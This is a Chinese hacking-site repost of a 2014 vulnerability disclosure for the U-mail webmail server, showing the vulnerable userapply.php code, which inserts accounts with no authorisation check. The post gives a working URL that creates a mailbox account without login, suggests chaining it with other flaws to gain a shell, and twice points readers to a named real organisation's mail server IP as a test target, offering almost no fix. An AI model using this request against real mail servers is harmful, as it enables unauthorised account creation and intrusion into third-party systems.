记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

U-mail任意用户添加漏洞(无需登录)

2014-12-24 06:00

由该漏洞即刻能增加邮件一名用户,通过配合其他未知0day 即可getshell

只要登录了邮件服务器,危害就很大了。。你懂的。。可导致服务器被入侵。。。

文章最后放例子。。。(湖南卫视邮件服务器)



在userapply.php中

//省略若干代码



code 区域
if ($Password == "" )

{

$Password= "11111";

}

if( $nickname == "" )

{

$nickname= "{$Mailbox}";

}

$insert= "insert intouserlist(Mailbox,FullName,MailDir,Password,AllowAccess,AllowChangeViaEmail,KeepForwardedMail,ApplyQuotas,EnableMultiPop,MaxDiskSpace,MaxNetFileSpace,DomainID)values('".$Mailbox."','{$nickname}','{$MailDir}','{$Password}','1','1','1','1','1','{$MaxDiskSpace}','{$MaxNetFileSpace}','{$DomainID}')"; //漏洞点

$resadd= @mysql_query( $insert );

$token= md5( uniqid( rand( ) ) );

$email= $Mailbox."@".$domainname;

$full= $Mailbox;

$reg_time= date( "Y-m-d H:i:s" );

$reg_ip= getenv( "REMOTE_ADDR" );

$log= "insert intoadmlog(usr_code,username,domainname,action,acttime,Actmailbox,Actdomainname,actarm)values('00','applyuser','".$domainname."','add','{$reg_time}','{$Mailbox}','{$domainname}','user')";

if( $Mailbox != "" )

…..//省略若干代码





由于当execadd 变量存在的情况下,然后执行,由于又未做任何判断,当他不存在的时候,直接执行一个insert语句,导致可以添加任意用户

当我们构造好下面链接,即可添加一个用户名为test1234 密码为fuck123456的用户





如访问此链接

Http://192.168.56.128/webmail/userapply.php?execadd=1&DomainID=1&setuppath=8888888&Mailbox=test1234&Password=fuck123456&DomainID=1

t010e0a213994aa0898.jpg





如需测试案例。。这里走起



http://58.20.34.226/ (湖南卫视邮件服务器)

漏洞证明:

Http://192.168.56.128/webmail/userapply.php?execadd=1&DomainID=1&setuppath=8888888&Mailbox=test1234&Password=fuck123456&DomainID=1

t010e0a213994aa0898.jpg



如需测试案例。。这里走起



http://58.20.34.226/ (湖南卫视邮件服务器)

修复方案:

考虑考虑下逻辑呗?

知识来源: www.wooyun.org/bugs/wooyun-2014-077235

阅读:80912 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“U-mail任意用户添加漏洞(无需登录)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云